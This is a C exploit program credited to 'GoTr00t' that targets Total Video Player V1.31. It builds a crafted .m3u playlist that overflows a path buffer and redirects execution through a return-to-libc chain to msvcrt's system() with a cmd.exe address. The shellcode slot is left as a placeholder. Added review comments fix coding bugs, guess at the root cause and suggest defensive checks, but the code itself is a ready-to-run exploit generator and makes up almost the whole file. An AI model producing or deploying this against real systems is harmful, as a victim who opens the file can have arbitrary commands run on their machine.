/*
28-08-2012
Total Video Player V1.31 m3u playlist exploit
Local Exploit
Written by GoTr00t
Tested on Windows 7
aksuumit[at]hotmail.com
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
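/*
 * Builds the proof-of-concept playlist described in the file header and
 * writes it to "exploit.m3u" in the current working directory.
 *
 * Entry layout, exactly as the author arranged it:
 *   "#EXTM3U\n#EXTINF:,\n"  playlist header
 *   "c:\"                   path prefix
 *   303 x 0x41              filler
 *    40 x 0x90              NOP bytes
 *   160 x 0x55              placeholder the author calls "fake shellcode"
 *   3 x 4 bytes             little-endian values (see comments below)
 *
 * Returns 0 on success, EXIT_FAILURE if the file cannot be created or written.
 *
 * Review notes:
 *  - The absolute addresses are the author's values from one test machine
 *    (header says Windows 7). They depend on where that DLL build was loaded,
 *    so treat them as sample values, not constants.
 *  - Root cause is not visible here; presumably the player copies the path
 *    entry into a fixed-size stack buffer without a length check.
 *  - Defensive takeaway: a playlist entry several hundred bytes long that
 *    contains non-printable bytes is far outside what a legitimate .m3u
 *    holds; a parser should bound the entry length before copying, and file
 *    scanning can flag such entries.
 */
int main(void)
{
    enum { FILLER_LEN = 303, NOP_LEN = 40, PLACEHOLDER_LEN = 160 };

    char exploit[3000];
    memset(exploit, 0x00, sizeof(exploit));

    /*
     * Each piece gets one extra zeroed byte so it is a real C string.
     * The original filled nops[40] and shellcode[160] completely and left the
     * last byte of overflow[304] unset, so strcat() read past the arrays
     * (undefined behaviour; output depended on the stack layout).
     */
    char overflow[FILLER_LEN + 1] = {0};
    memset(overflow, 0x41, FILLER_LEN);
    char nops[NOP_LEN + 1] = {0};
    memset(nops, 0x90, NOP_LEN);
    char shellcode[PLACEHOLDER_LEN + 1] = {0};
    memset(shellcode, 0x55, PLACEHOLDER_LEN);

    char HEADER[] = "#EXTM3U\n#EXTINF:,\n";
    // 7694B177 address of system in the msvcrt.dll
    char newEIP[] = "\x77\xB1\x94\x76";

    /* Total is well under sizeof(exploit), so the strcat chain stays in bounds. */
    strcpy(exploit, HEADER);
    strcat(exploit, "c:\\");
    strcat(exploit, overflow);
    strcat(exploit, nops);
    // fake shellcode: the author notes there are multiple ways to exploit
    // this vulnerability and that a shellcode could be placed here
    strcat(exploit, shellcode);
    // and use this EIP to jump to the shellcode; for this example the author
    // uses a return2dll technique
    strcat(exploit, newEIP);
    // junk, or (per the author) a slot that could jump to another dll for a
    // ROP to bypass protection
    strcat(exploit, "\x44\x44\x44\x44");
    // 7638BF27 cmd.exe
    strcat(exploit, "\x27\xBF\x38\x76");

    // Write the playlist file
    FILE *fp = fopen("exploit.m3u", "w");
    if (fp == NULL) {
        /* The original passed a possibly-NULL FILE* straight to fprintf. */
        perror("exploit.m3u");
        return EXIT_FAILURE;
    }

    /*
     * fputs, not fprintf(fp, exploit): the buffer is data, and using it as
     * the format string would misbehave as soon as it contained a '%'.
     */
    if (fputs(exploit, fp) == EOF) {
        perror("exploit.m3u");
        fclose(fp);
        return EXIT_FAILURE;
    }
    if (fclose(fp) != 0) {
        perror("exploit.m3u");
        return EXIT_FAILURE;
    }

    printf("Exploit written!\n");
    return 0;
}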